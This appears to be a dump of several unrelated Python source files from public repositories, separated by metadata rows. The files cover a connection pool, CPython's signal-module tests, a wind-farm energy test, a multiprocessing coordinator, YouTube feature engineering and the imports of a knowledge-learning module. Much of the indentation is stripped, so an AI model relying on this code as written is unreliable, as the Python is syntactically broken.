                        logger.error('Failed to create new connection, host: %s, port: %s, error: %s', self.host, self.port, e)
# else:
                # Should never happen; log an error if it does
                # logger.error("Not enough room in the queue to create active connections")
@property
def size(self):
return self.pool.qsize()
def invalidate_all(self):
if self.pool.qsize():
while True:
try:
self.pool.get_nowait().invalidate()
except self.import_queue.Empty:
break
except Exception as e:
logger.error("异常信息:%s", e)
logger.info("与主机[%s]端口[%s]连接已释放", self.host, self.port)
def put_connect(self, conn: Connector):
if conn.host != self.host or conn.port != self.port:
conn.invalidate()
return False
with self.sem:
if self.pool.qsize() < self.max_count:
if self.verify_connect(conn):
try:
self.pool.put_nowait(conn)
return True
except self.import_queue.Full:
conn.invalidate()
return False
else:
conn.invalidate()
return False
def get_connect(self, host=None, port=80):
size = self.pool.qsize()
if size:
now = time.time()
while True:
try:
conn = self.pool.get_nowait()
if self.verify_connect(conn, now):
return conn
else:
size -= 1
if size <= 0:
break
except self.import_queue.Empty:
return None
except Exception as e:
logger.error("异常信息:%s", e)
size -= 1
if size <= 0:
break
try:
new_item = self.conn_factory(host, port, self.backend_mod)
new_item.connect()
return new_item
except Exception as e:
logger.error("创建连接异常:%s", e)
return None
# else:
# # we should be connected now
# with self.sem:
def connect_all(self):
size = self.pool.qsize()
if size:
while True:
try:
size -= 1
conn = self.pool.get_nowait()
if conn.is_valid():
conn.connect()
self.pool.put_nowait(conn)
else:
conn.invalidate()
if size <= 0:
break
except self.import_queue.Full:
break
except self.import_queue.Empty:
break
except Exception as e:
logger.error("异常信息:%s", e)
for i in range(self.max_count - self.pool.qsize()):
new_connect = None
try:
new_connect = self.conn_factory(self.host, self.port, self.backend_mod, True)
self.pool.put_nowait(new_connect)
except self.import_queue.Full:
if new_connect:
new_connect.invalidate()
break
except Exception as e:
                logger.error('Failed to create new connection: %s', e)
        logger.info("Host [%s] port [%s]: created [%s] new connections", self.host, self.port, self.pool.qsize())
| 37.264317 | 101 | 0.485991 |
4a1b4a654f7cc3e4a380891359c020f383d8dc57
| 18,855 |
py
|
Python
|
exe/portable-python/App/Lib/test/test_signal.py
|
jaredmusil/iawsc-data-toolbox
|
65b97d45e13813935017f8b3c5726784027b065f
|
[
"MIT"
] | null | null | null |
exe/portable-python/App/Lib/test/test_signal.py
|
jaredmusil/iawsc-data-toolbox
|
65b97d45e13813935017f8b3c5726784027b065f
|
[
"MIT"
] | 1 |
2018-04-15T22:59:15.000Z
|
2018-04-15T22:59:15.000Z
|
exe/portable-python/App/Lib/test/test_signal.py
|
jaredmusil/iawsc-data-toolbox
|
65b97d45e13813935017f8b3c5726784027b065f
|
[
"MIT"
] | null | null | null |
import errno
import gc
import os
import pickle
import select
import signal
import subprocess
import sys
import time
import traceback
import unittest
from test import support
from contextlib import closing
from test.script_helper import assert_python_ok, spawn_python
if sys.platform in ('os2', 'riscos'):
raise unittest.SkipTest("Can't test signal on %s" % sys.platform)
class HandlerBCalled(Exception):
pass
def exit_subprocess():
"""Use os._exit(0) to exit the current subprocess.
Otherwise, the test catches the SystemExit and continues executing
in parallel with the original test, so you wind up with an
exponential number of tests running concurrently.
"""
os._exit(0)
def ignoring_eintr(__func, *args, **kwargs):
try:
return __func(*args, **kwargs)
except EnvironmentError as e:
if e.errno != errno.EINTR:
raise
return None
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class InterProcessSignalTests(unittest.TestCase):
MAX_DURATION = 20 # Entire test should last at most 20 sec.
def setUp(self):
self.using_gc = gc.isenabled()
gc.disable()
def tearDown(self):
if self.using_gc:
gc.enable()
def format_frame(self, frame, limit=None):
return ''.join(traceback.format_stack(frame, limit=limit))
def handlerA(self, signum, frame):
self.a_called = True
if support.verbose:
print("handlerA invoked from signal %s at:\n%s" % (
signum, self.format_frame(frame, limit=1)))
def handlerB(self, signum, frame):
self.b_called = True
if support.verbose:
print ("handlerB invoked from signal %s at:\n%s" % (
signum, self.format_frame(frame, limit=1)))
raise HandlerBCalled(signum, self.format_frame(frame))
def wait(self, child):
"""Wait for child to finish, ignoring EINTR."""
while True:
try:
child.wait()
return
except OSError as e:
if e.errno != errno.EINTR:
raise
def run_test(self):
# Install handlers. This function runs in a sub-process, so we
# don't worry about re-setting the default handlers.
signal.signal(signal.SIGHUP, self.handlerA)
signal.signal(signal.SIGUSR1, self.handlerB)
signal.signal(signal.SIGUSR2, signal.SIG_IGN)
signal.signal(signal.SIGALRM, signal.default_int_handler)
# Variables the signals will modify:
self.a_called = False
self.b_called = False
# Let the sub-processes know who to send signals to.
pid = os.getpid()
if support.verbose:
print("test runner's pid is", pid)
child = ignoring_eintr(subprocess.Popen, ['kill', '-HUP', str(pid)])
if child:
self.wait(child)
if not self.a_called:
time.sleep(1) # Give the signal time to be delivered.
self.assertTrue(self.a_called)
self.assertFalse(self.b_called)
self.a_called = False
# Make sure the signal isn't delivered while the previous
# Popen object is being destroyed, because __del__ swallows
# exceptions.
del child
try:
child = subprocess.Popen(['kill', '-USR1', str(pid)])
# This wait should be interrupted by the signal's exception.
self.wait(child)
time.sleep(1) # Give the signal time to be delivered.
self.fail('HandlerBCalled exception not raised')
except HandlerBCalled:
self.assertTrue(self.b_called)
self.assertFalse(self.a_called)
if support.verbose:
print("HandlerBCalled exception caught")
child = ignoring_eintr(subprocess.Popen, ['kill', '-USR2', str(pid)])
if child:
self.wait(child) # Nothing should happen.
try:
signal.alarm(1)
# The race condition in pause doesn't matter in this case,
# since alarm is going to raise a KeyboardException, which
# will skip the call.
signal.pause()
# But if another signal arrives before the alarm, pause
# may return early.
time.sleep(1)
except KeyboardInterrupt:
if support.verbose:
print("KeyboardInterrupt (the alarm() went off)")
except:
self.fail("Some other exception woke us from pause: %s" %
traceback.format_exc())
else:
self.fail("pause returned of its own accord, and the signal"
" didn't arrive after another second.")
# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform=='freebsd6',
'inter process signals not reliable (do not mix well with threading) '
'on freebsd6')
def test_main(self):
# This function spawns a child process to insulate the main
# test-running process from all the signals. It then
# communicates with that child process over a pipe and
# re-raises information about any exceptions the child
# raises. The real work happens in self.run_test().
os_done_r, os_done_w = os.pipe()
with closing(os.fdopen(os_done_r, 'rb')) as done_r, \
closing(os.fdopen(os_done_w, 'wb')) as done_w:
child = os.fork()
if child == 0:
# In the child process; run the test and report results
# through the pipe.
try:
done_r.close()
# Have to close done_w again here because
# exit_subprocess() will skip the enclosing with block.
with closing(done_w):
try:
self.run_test()
except:
pickle.dump(traceback.format_exc(), done_w)
else:
pickle.dump(None, done_w)
except:
print('Uh oh, raised from pickle.')
traceback.print_exc()
finally:
exit_subprocess()
done_w.close()
# Block for up to MAX_DURATION seconds for the test to finish.
r, w, x = select.select([done_r], [], [], self.MAX_DURATION)
if done_r in r:
tb = pickle.load(done_r)
if tb:
self.fail(tb)
else:
os.kill(child, signal.SIGKILL)
self.fail('Test deadlocked after %d seconds.' %
self.MAX_DURATION)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class BasicSignalTests(unittest.TestCase):
def trivial_signal_handler(self, *args):
pass
def test_out_of_range_signal_number_raises_error(self):
self.assertRaises(ValueError, signal.getsignal, 4242)
self.assertRaises(ValueError, signal.signal, 4242,
self.trivial_signal_handler)
def test_setting_signal_handler_to_none_raises_error(self):
self.assertRaises(TypeError, signal.signal,
signal.SIGUSR1, None)
def test_getsignal(self):
hup = signal.signal(signal.SIGHUP, self.trivial_signal_handler)
self.assertEqual(signal.getsignal(signal.SIGHUP),
self.trivial_signal_handler)
signal.signal(signal.SIGHUP, hup)
self.assertEqual(signal.getsignal(signal.SIGHUP), hup)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
class WindowsSignalTests(unittest.TestCase):
def test_issue9324(self):
# Updated for issue #10003, adding SIGBREAK
handler = lambda x, y: None
for sig in (signal.SIGABRT, signal.SIGBREAK, signal.SIGFPE,
signal.SIGILL, signal.SIGINT, signal.SIGSEGV,
signal.SIGTERM):
# Set and then reset a handler for signals that work on windows
signal.signal(sig, signal.signal(sig, handler))
with self.assertRaises(ValueError):
signal.signal(-1, handler)
with self.assertRaises(ValueError):
signal.signal(7, handler)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class WakeupSignalTests(unittest.TestCase):
def check_wakeup(self, test_body):
# use a subprocess to have only one thread and to not change signal
# handling of the parent process
code = """if 1:
import fcntl
import os
import signal
def handler(signum, frame):
pass
{}
signal.signal(signal.SIGALRM, handler)
read, write = os.pipe()
flags = fcntl.fcntl(write, fcntl.F_GETFL, 0)
flags = flags | os.O_NONBLOCK
fcntl.fcntl(write, fcntl.F_SETFL, flags)
signal.set_wakeup_fd(write)
test()
os.close(read)
os.close(write)
""".format(test_body)
assert_python_ok('-c', code)
def test_wakeup_fd_early(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
signal.alarm(1)
before_time = time.time()
# We attempt to get a signal during the sleep,
# before select is called
time.sleep(TIMEOUT_FULL)
mid_time = time.time()
dt = mid_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
select.select([read], [], [], TIMEOUT_FULL)
after_time = time.time()
dt = after_time - mid_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""")
def test_wakeup_fd_during(self):
self.check_wakeup("""def test():
import select
import time
TIMEOUT_FULL = 10
TIMEOUT_HALF = 5
signal.alarm(1)
before_time = time.time()
# We attempt to get a signal during the select call
try:
select.select([read], [], [], TIMEOUT_FULL)
except select.error:
pass
else:
raise Exception("select.error not raised")
after_time = time.time()
dt = after_time - before_time
if dt >= TIMEOUT_HALF:
raise Exception("%s >= %s" % (dt, TIMEOUT_HALF))
""")
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class SiginterruptTest(unittest.TestCase):
def readpipe_interrupted(self, interrupt):
"""Perform a read during which a signal will arrive. Return True if the
read is interrupted by the signal and raises an exception. Return False
if it returns normally.
"""
class Timeout(Exception):
pass
# use a subprocess to have only one thread, to have a timeout on the
# blocking read and to not touch signal handling in this process
code = """if 1:
import errno
import os
import signal
import sys
interrupt = %r
r, w = os.pipe()
def handler(signum, frame):
pass
signal.signal(signal.SIGALRM, handler)
if interrupt is not None:
signal.siginterrupt(signal.SIGALRM, interrupt)
print("ready")
sys.stdout.flush()
# run the test twice
for loop in range(2):
# send a SIGALRM in a second (during the read)
signal.alarm(1)
try:
# blocking call: read from a pipe without data
os.read(r, 1)
except OSError as err:
if err.errno != errno.EINTR:
raise
else:
sys.exit(2)
sys.exit(3)
""" % (interrupt,)
with spawn_python('-c', code) as process:
try:
# wait until the child process is loaded and has started
first_line = process.stdout.readline()
# Wait the process with a timeout of 5 seconds
timeout = time.time() + 5.0
while True:
if timeout < time.time():
raise Timeout()
status = process.poll()
if status is not None:
break
time.sleep(0.1)
stdout, stderr = process.communicate()
except Timeout:
process.kill()
return False
else:
stdout = first_line + stdout
exitcode = process.wait()
if exitcode not in (2, 3):
raise Exception("Child error (exit code %s): %s"
% (exitcode, stdout))
return (exitcode == 3)
def test_without_siginterrupt(self):
# If a signal handler is installed and siginterrupt is not called
# at all, when that signal arrives, it interrupts a syscall that's in
# progress.
interrupted = self.readpipe_interrupted(None)
self.assertTrue(interrupted)
def test_siginterrupt_on(self):
# If a signal handler is installed and siginterrupt is called with
# a true value for the second argument, when that signal arrives, it
# interrupts a syscall that's in progress.
interrupted = self.readpipe_interrupted(True)
self.assertTrue(interrupted)
def test_siginterrupt_off(self):
# If a signal handler is installed and siginterrupt is called with
# a false value for the second argument, when that signal arrives, it
# does not interrupt a syscall that's in progress.
interrupted = self.readpipe_interrupted(False)
self.assertFalse(interrupted)
@unittest.skipIf(sys.platform == "win32", "Not valid on Windows")
class ItimerTest(unittest.TestCase):
def setUp(self):
self.hndl_called = False
self.hndl_count = 0
self.itimer = None
self.old_alarm = signal.signal(signal.SIGALRM, self.sig_alrm)
def tearDown(self):
signal.signal(signal.SIGALRM, self.old_alarm)
if self.itimer is not None: # test_itimer_exc doesn't change this attr
# just ensure that itimer is stopped
signal.setitimer(self.itimer, 0)
def sig_alrm(self, *args):
self.hndl_called = True
if support.verbose:
print("SIGALRM handler invoked", args)
def sig_vtalrm(self, *args):
self.hndl_called = True
if self.hndl_count > 3:
# it shouldn't be here, because it should have been disabled.
raise signal.ItimerError("setitimer didn't disable ITIMER_VIRTUAL "
"timer.")
elif self.hndl_count == 3:
# disable ITIMER_VIRTUAL, this function shouldn't be called anymore
signal.setitimer(signal.ITIMER_VIRTUAL, 0)
if support.verbose:
print("last SIGVTALRM handler call")
self.hndl_count += 1
if support.verbose:
print("SIGVTALRM handler invoked", args)
def sig_prof(self, *args):
self.hndl_called = True
signal.setitimer(signal.ITIMER_PROF, 0)
if support.verbose:
print("SIGPROF handler invoked", args)
def test_itimer_exc(self):
# XXX I'm assuming -1 is an invalid itimer, but maybe some platform
# defines it ?
self.assertRaises(signal.ItimerError, signal.setitimer, -1, 0)
# Negative times are treated as zero on some platforms.
if 0:
self.assertRaises(signal.ItimerError,
signal.setitimer, signal.ITIMER_REAL, -1)
def test_itimer_real(self):
self.itimer = signal.ITIMER_REAL
signal.setitimer(self.itimer, 1.0)
if support.verbose:
print("\ncall pause()...")
signal.pause()
self.assertEqual(self.hndl_called, True)
# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform in ('freebsd6', 'netbsd5'),
'itimer not reliable (does not mix well with threading) on some BSDs.')
def test_itimer_virtual(self):
self.itimer = signal.ITIMER_VIRTUAL
signal.signal(signal.SIGVTALRM, self.sig_vtalrm)
signal.setitimer(self.itimer, 0.3, 0.2)
start_time = time.time()
while time.time() - start_time < 60.0:
# use up some virtual time by doing real work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_vtalrm handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# virtual itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
# Issue 3864, unknown if this affects earlier versions of freebsd also
@unittest.skipIf(sys.platform=='freebsd6',
'itimer not reliable (does not mix well with threading) on freebsd6')
def test_itimer_prof(self):
self.itimer = signal.ITIMER_PROF
signal.signal(signal.SIGPROF, self.sig_prof)
signal.setitimer(self.itimer, 0.2, 0.2)
start_time = time.time()
while time.time() - start_time < 60.0:
# do some work
_ = pow(12345, 67890, 10000019)
if signal.getitimer(self.itimer) == (0.0, 0.0):
break # sig_prof handler stopped this itimer
else: # Issue 8424
self.skipTest("timeout: likely cause: machine too slow or load too "
"high")
# profiling itimer should be (0.0, 0.0) now
self.assertEqual(signal.getitimer(self.itimer), (0.0, 0.0))
# and the handler should have been called
self.assertEqual(self.hndl_called, True)
def test_main():
try:
support.run_unittest(BasicSignalTests, InterProcessSignalTests,
WakeupSignalTests, SiginterruptTest,
ItimerTest, WindowsSignalTests)
finally:
support.reap_children()
if __name__ == "__main__":
test_main()
| 35.914286 | 80 | 0.579528 |
4a1b4aea445a44bb0354406a59901ff6cd1f7daf
| 2,809 |
py
|
Python
|
src/fusedwind/plant_flow/test/test_asym.py
|
FUSED-Wind/fusedwind
|
5025b84f8bfb334b33bf172bf1a39e3abcadab15
|
[
"Apache-2.0"
] | 15 |
2015-01-19T18:20:35.000Z
|
2021-12-21T05:50:38.000Z
|
src/fusedwind/plant_flow/test/test_asym.py
|
michaelXDzhang/fusedwind
|
5025b84f8bfb334b33bf172bf1a39e3abcadab15
|
[
"Apache-2.0"
] | 61 |
2015-01-05T02:47:35.000Z
|
2019-10-09T02:18:13.000Z
|
src/fusedwind/plant_flow/test/test_asym.py
|
michaelXDzhang/fusedwind
|
5025b84f8bfb334b33bf172bf1a39e3abcadab15
|
[
"Apache-2.0"
] | 11 |
2015-01-16T03:05:49.000Z
|
2021-02-16T13:57:59.000Z
|
# test_fused_plant_asym
from random import random
import unittest
from fusedwind.plant_flow.asym import *
from test_comp import TestWindFarm
from test_vt import generate_random_GenericWindRoseVT
from fusedwind.plant_flow.generate_fake_vt import generate_random_wt_layout
import numpy as np
def generate_inputs_AEPWindRose(aep):
aep.wind_speeds = linspace(0., 30, np.random.randint(30)).tolist()
aep.wind_directions = linspace(0., 360, np.random.randint(360))[:-1].tolist()
class test_AEPSingleWindRose(unittest.TestCase):
def test_init(self):
aep = AEPSingleWindRose()
def test_configure(self):
aep = AEPSingleWindRose()
aep.configure()
def test_run(self):
aep = AEPSingleWindRose()
aep.add('wf', TestWindFarm())
#aep.run()
#generate_inputs_AEPWindRose(aep)
wr = generate_random_GenericWindRoseVT()
aep.wind_rose = wr.frequency_array
aep.wind_speeds = wr.wind_speeds
aep.wind_directions = wr.wind_directions
#aep.create_passthrough('wf.wt_layout')
aep.wf.wt_layout = generate_random_wt_layout(nwt=50)
aep.run()
#print aep.net_aep, aep.gross_aep, aep.capacity_factor, aep.array_aep
        assert aep.net_aep > 0.0, 'net_aep hasn\'t been set properly: %f'%(aep.net_aep)
# TODO: set make the gross_aep work properly
#assert aep.gross_aep > 0.0, 'gross_aep hasn\'t been set properly: %f'%(aep.gross_aep)
#assert aep.gross_aep < aep.net_aep, 'gross_aep or net_aep haven\'t been set properly: gross=%f, net=%f'%(aep.gross_aep, aep.net_aep)
#assert aep.capacity_factor > 0.0 and aep.capacity_factor < 1.0, 'capacity factor is unrealistic: %f'%(aep.capacity_factor)
#import ipdb; ipdb.set_trace()
class MyTestWindFarm(GenericWindFarm):
def execute(self):
self.wt_power = [random() * wt_desc.power_rating for wt_desc in self.wt_layout.wt_list]
self.wt_thrust = [pow_ / (random() * self.wind_speed) for pow_ in self.wt_power]
self.power = sum(self.wt_power)
self.thrust = sum(self.wt_thrust)
class test_AEPMultipleWindRoses(unittest.TestCase):
def test_init(self):
aep = AEPMultipleWindRoses()
def test_configure(self):
aep = AEPMultipleWindRoses()
aep.configure()
def test_execute(self):
cG = AEPMultipleWindRoses()
cG.add('wf', MyTestWindFarm())
cG.configure()
cG.connect('wt_layout', 'wf.wt_layout')
cG.wind_speeds = np.linspace(4., 25., 10).tolist()
cG.wind_directions = np.linspace(0., 360., 36)[:-1].tolist()
nwt = 5
cG.wt_layout = generate_random_wt_layout(nwt=nwt)
cG.run()
        print(cG.net_aep)
        print(cG.wt_aep)
if __name__ == '__main__':
unittest.main()
| 36.012821 | 141 | 0.676753 |
4a1b4b766365303c8fcd0b127155f7cf38d14197
| 1,952 |
py
|
Python
|
a2c/async_coordinator.py
|
jondeaton/AgarAI
|
0c60896465a969ba6832a4b417cf6199715799a1
|
[
"MIT"
] | 1 |
2022-01-12T06:27:43.000Z
|
2022-01-12T06:27:43.000Z
|
a2c/async_coordinator.py
|
jondeaton/AgarAI
|
0c60896465a969ba6832a4b417cf6199715799a1
|
[
"MIT"
] | null | null | null |
a2c/async_coordinator.py
|
jondeaton/AgarAI
|
0c60896465a969ba6832a4b417cf6199715799a1
|
[
"MIT"
] | 2 |
2020-01-24T20:07:09.000Z
|
2022-01-12T06:27:47.000Z
|
"""
File: async_coordinator
Date: 9/21/19
Author: Jon Deaton (jonpauldeaton@gmail.com)
"""
from multiprocessing import Process, Queue, Condition, Semaphore
class AsyncCoordinator:
""" manages a collection of worker processes that
produce data to be consumed by the client of this class.
"""
def __init__(self, num_workers, worker_target, args):
""" Construct
:param num_workers: the number of worker processes
:param worker_target: function for each worker process to execute
        :param args: additional arguments appended to (wid, queue, sema)
        and passed to each worker
"""
self.num_workers = num_workers
self.worker_target = worker_target
self.args = args
self.queue = None
self.sema = None
self._workers = None
def open(self):
""" creates the collection of managed worker processes """
self.queue = Queue()
self.sema = Semaphore(0)
self._workers = []
for wid in range(self.num_workers):
worker = Process(target=self.worker_target,
args=(wid, self.queue, self.sema) + self.args)
worker.start()
self._workers.append(worker)
def close(self):
""" destroys the worker processes """
del self.queue
for worker in self._workers:
worker.terminate()
worker.join()
def start(self):
""" signals all worker processes to begin """
for _ in range(self.num_workers):
self.sema.release()
def pop(self):
""" blocks until there is a datum in the queue
produced by a worker, then removes and returns it.
"""
if self.queue is None:
            raise Exception("AsyncCoordinator is not open; call open() first")
return self.queue.get()
def __enter__(self):
self.open()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
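# --- usage sketch (illustrative only; the worker function and counts below are
# assumptions, not part of this module): workers wait on the semaphore that
# start() releases, then push data into the shared queue for pop() to consume.
def _example_worker(wid, queue, sema, n_items):
    sema.acquire()              # block until AsyncCoordinator.start()
    for i in range(n_items):
        queue.put((wid, i))     # hand a datum back to the consumer
if __name__ == '__main__':
    with AsyncCoordinator(num_workers=2, worker_target=_example_worker, args=(3,)) as coord:
        coord.start()
        for _ in range(2 * 3):
            print(coord.pop())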
| 29.134328 | 75 | 0.602459 |
4a1b4bccbe171878b7f9940e273e436875e773cd
| 10,304 |
py
|
Python
|
features/create.py
|
mei28/youtube_comp
|
cb8dee465a873436779e6fbb82224523805c6f6f
|
[
"MIT"
] | null | null | null |
features/create.py
|
mei28/youtube_comp
|
cb8dee465a873436779e6fbb82224523805c6f6f
|
[
"MIT"
] | null | null | null |
features/create.py
|
mei28/youtube_comp
|
cb8dee465a873436779e6fbb82224523805c6f6f
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import re as re
from base import Feature, get_arguments, generate_features
Feature.dir = 'features'
# """sample usage
# """
# class Pclass(Feature):
# def create_features(self):
# self.train['Pclass'] = train['Pclass']
# self.test['Pclass'] = test['Pclass']
class Year(Feature):
def create_features(self):
self.train["year"] = pd.to_datetime(train["publishedAt"]).dt.year
self.test["year"] = pd.to_datetime(test["publishedAt"]).dt.year
class Month(Feature):
def create_features(self):
self.train["month"] = pd.to_datetime(train["publishedAt"]).dt.month
self.test["month"] = pd.to_datetime(test["publishedAt"]).dt.month
class Day(Feature):
def create_features(self):
self.train["day"] = pd.to_datetime(train["publishedAt"]).dt.day
self.test["day"] = pd.to_datetime(test["publishedAt"]).dt.day
class Hour(Feature):
def create_features(self):
self.train["hour"] = pd.to_datetime(train["publishedAt"]).dt.hour
self.test["hour"] = pd.to_datetime(test["publishedAt"]).dt.hour
class Minute(Feature):
def create_features(self):
self.train["minute"] = pd.to_datetime(train["publishedAt"]).dt.minute
self.test["minute"] = pd.to_datetime(test["publishedAt"]).dt.minute
def return_collection_dt(df):
df['collection_date'] = df["collection_date"]
return pd.to_datetime(df['collection_date'], format="%y.%d.%m")
class C_year(Feature):
def create_features(self):
self.train["c_year"] = return_collection_dt(train).dt.year
self.test["c_year"] = return_collection_dt(test).dt.year
class C_month(Feature):
def create_features(self):
self.train["c_month"] = return_collection_dt(train).dt.month
self.test["c_month"] = return_collection_dt(test).dt.month
class C_day(Feature):
def create_features(self):
self.train["c_day"] = return_collection_dt(train).dt.day
self.test["c_day"] = return_collection_dt(test).dt.day
class Length_tags(Feature):
def create_features(self):
self.train["length_tags"] = train['tags'].astype(
str).apply(lambda x: len(x.split("|")))
self.test["lenght_tags"] = test['tags'].astype(
str).apply(lambda x: len(x.split("|")))
class Category_id(Feature):
def create_features(self):
self.train["categoryId"] = train['categoryId']
self.test["categoryId"] = test['categoryId']
class Likes(Feature):
def create_features(self):
self.train["likes"] = train['likes']
self.test["likes"] = test['likes']
self.train["likes2"] = train['likes'] ** 2
self.test['likes2'] = test['likes'] ** 2
self.train['loglikes'] = np.log(train['likes']+1)
self.test['loglikes'] = np.log(test['likes']+1)
class Dislikes(Feature):
def create_features(self):
self.train["dislikes"] = train['dislikes']
self.test["dislikes"] = test['dislikes']
self.train["dislikes2"] = train['dislikes'] ** 2
self.test['dislikes2'] = test['dislikes'] ** 2
self.train['logdislikes'] = np.log(train['dislikes']+1)
self.test['logdislikes'] = np.log(test['dislikes']+1)
class Comment_count(Feature):
def create_features(self):
self.train["comment_count"] = train['comment_count']
self.test["comment_count"] = test['comment_count']
class Comments_disabled(Feature):
def create_features(self):
self.train["comments_disabled"] = train['comments_disabled']
self.test["comments_disabled"] = test['comments_disabled']
class Ratings_disabled(Feature):
def create_features(self):
self.train["ratings_disabled"] = train['ratings_disabled']
self.test["ratings_disabled"] = test['ratings_disabled']
class Channel_id_enc(Feature):
def create_features(self):
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
cat_cols = 'channelId'
df_all = pd.concat([train[cat_cols], test[cat_cols]])
le.fit(df_all)
self.train['channelId_enc'] = le.transform(train[cat_cols])
self.test['channelId_enc'] = le.transform(test[cat_cols])
class Dislikes_rate(Feature):
def create_features(self):
self.train['dislike_rate'] = train['dislikes'] / \
(train['likes'] + train["dislikes"])
self.test['dislike_rate'] = test['dislikes'] / \
(test['likes']+test['dislikes'])
class Likes_rate(Feature):
def create_features(self):
self.train["like_rate"] = train['likes'] / \
(train['likes'] + train['dislikes'])
self.test["like_rate"] = test['likes']/(test["dislikes"]+test["likes"])
class Likes_dislikes_rate(Feature):
def create_features(self):
self.train['likes_dislike_ratio'] = train['likes'] / \
(train['dislikes'] + 1)
self.test['likes_dislike_ratio'] = test['likes'] / (test['dislikes']+1)
class Channel_title_enc(Feature):
def create_features(self):
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
col = 'channelTitle'
df_all = pd.concat([train[col], test[col]])
le.fit(df_all)
self.train[col+'_enc'] = le.transform(train[col])
self.test[col+'_enc'] = le.transform(test[col])
class Comment_likes_dislikes_ratio(Feature):
def create_features(self):
self.train['comments_like_ratio'] = train['comment_count'] / \
(train['likes'] + 1)
self.test['comments_like_ratio'] = test['comment_count'] / \
(test['likes'] + 1)
self.train['comments_dislike_ratio'] = train['comment_count'] / \
(train['dislikes'] + 1)
self.test['comments_dislike_ratio'] = test['comment_count'] / \
(test['dislikes'] + 1)
class Likes_comments_disable(Feature):
def create_features(self):
self.train['likes_com'] = train['likes'] * train["comments_disabled"]
self.test['likes_com'] = test['likes'] * test["comments_disabled"]
self.train['dislikes_com'] = train['dislikes'] * \
train["comments_disabled"]
self.test['dislikes_com'] = test['dislikes'] * \
test["comments_disabled"]
self.train['comments_likes'] = train['comment_count'] * \
train['ratings_disabled']
self.test['comments_likes'] = test['comment_count'] * \
test['ratings_disabled']
class Delta_time(Feature):
def create_features(self):
train["collection_date"] = pd.to_datetime(
"20" + train["collection_date"], format="%Y.%d.%m", utc=True)
test["collection_date"] = pd.to_datetime(
"20" + test["collection_date"], format="%Y.%d.%m", utc=True)
train["publishedAt"] = pd.to_datetime(train['publishedAt'], utc=True)
test["publishedAt"] = pd.to_datetime(test['publishedAt'], utc=True)
self.train["delta"] = (train["collection_date"] - train["publishedAt"]
).apply(lambda x: x.days)
self.test["delta"] = (test["collection_date"] - test["publishedAt"]
).apply(lambda x: x.days)
self.train['log_delta'] = np.log(self.train['delta'])
self.test['log_delta'] = np.log(self.test['delta'])
class Description(Feature):
def create_features(self):
train['description'].fillna(" ", inplace=True)
test['description'].fillna(" ", inplace=True)
self.train['has_http'] = train['description'].apply(
lambda x: x.lower().count('http'))
self.test['has_http'] = test['description'].apply(
lambda x: x.lower().count('http'))
self.train['len_description'] = train['description'].apply(
lambda x: len(x))
self.test['len_description'] = test['description'].apply(
lambda x: len(x))
class Music(Feature):
def create_features(self):
train['tags'].fillna(" ", inplace=True)
test['tags'].fillna(" ", inplace=True)
self.train['music_title'] = train['title'].apply(
lambda x: 'music' in x.lower())
self.test['music_title'] = test['title'].apply(
lambda x: 'music' in x.lower())
self.train['music_tabs'] = train['tags'].apply(
lambda x: 'music' in x.lower())
self.test['music_tabs'] = test['tags'].apply(
lambda x: 'music' in x.lower())
class Official(Feature):
def create_features(self):
self.train['official_title'] = train['title'].apply(
lambda x: 'fficial' in x.lower())
self.test['official_title'] = test['title'].apply(
lambda x: 'fficial' in x.lower())
self.train['official_ja'] = train['title'].apply(
lambda x: '公式' in x.lower())
self.test['official_ja'] = test['title'].apply(
lambda x: '公式' in x.lower())
class CM(Feature):
def create_features(self):
train['tags'].fillna(" ", inplace=True)
test['tags'].fillna(" ", inplace=True)
train['description'].fillna(" ", inplace=True)
test['description'].fillna(" ", inplace=True)
self.train['cm_title'] = train['title'].apply(
lambda x: 'cm' in x.lower())
self.test['cm_title'] = test['title'].apply(
lambda x: 'cm' in x.lower())
self.train['cm_tags'] = train['tags'].apply(
lambda x: 'cm' in x.lower())
self.test['cm_tags'] = test['tags'].apply(
lambda x: 'cm' in x.lower())
self.train['cm_description'] = train['description'].apply(
lambda x: 'cm' in x.lower())
self.test['cm_description'] = test['description'].apply(
lambda x: 'cm' in x.lower())
if __name__ == '__main__':
args = get_arguments()
# train = pd.read_feather('./data/input/train.feather')
# test = pd.read_feather('./data/input/test.feather')
train = pd.read_feather('./data/input/train.feather')
test = pd.read_feather('./data/input/test.feather')
generate_features(globals(), args.force)
| 35.902439 | 79 | 0.614227 |
4a1b4bda7371138ebd2567b5a3db0257c9d1f574
| 13,760 |
py
|
Python
|
knowledge.py
|
EDTAKE/IA
|
2731e8ccb9d1b72f564c8c7a1c46a855760edfac
|
[
"MIT"
] | null | null | null |
knowledge.py
|
EDTAKE/IA
|
2731e8ccb9d1b72f564c8c7a1c46a855760edfac
|
[
"MIT"
] | null | null | null |
knowledge.py
|
EDTAKE/IA
|
2731e8ccb9d1b72f564c8c7a1c46a855760edfac
|
[
"MIT"
] | 1 |
2019-10-26T22:33:40.000Z
|
2019-10-26T22:33:40.000Z
|
"""Knowledge in learning, Chapter 19"""
from random import shuffle
from math import log
from utils import powerset
from collections import defaultdict
from itertools import combinations, product
from logic import (FolKB, constant_symbols, predicate_symbols, standardize_variables,
variables, is_definite_clause, subst, expr, Expr)
from functools import partial
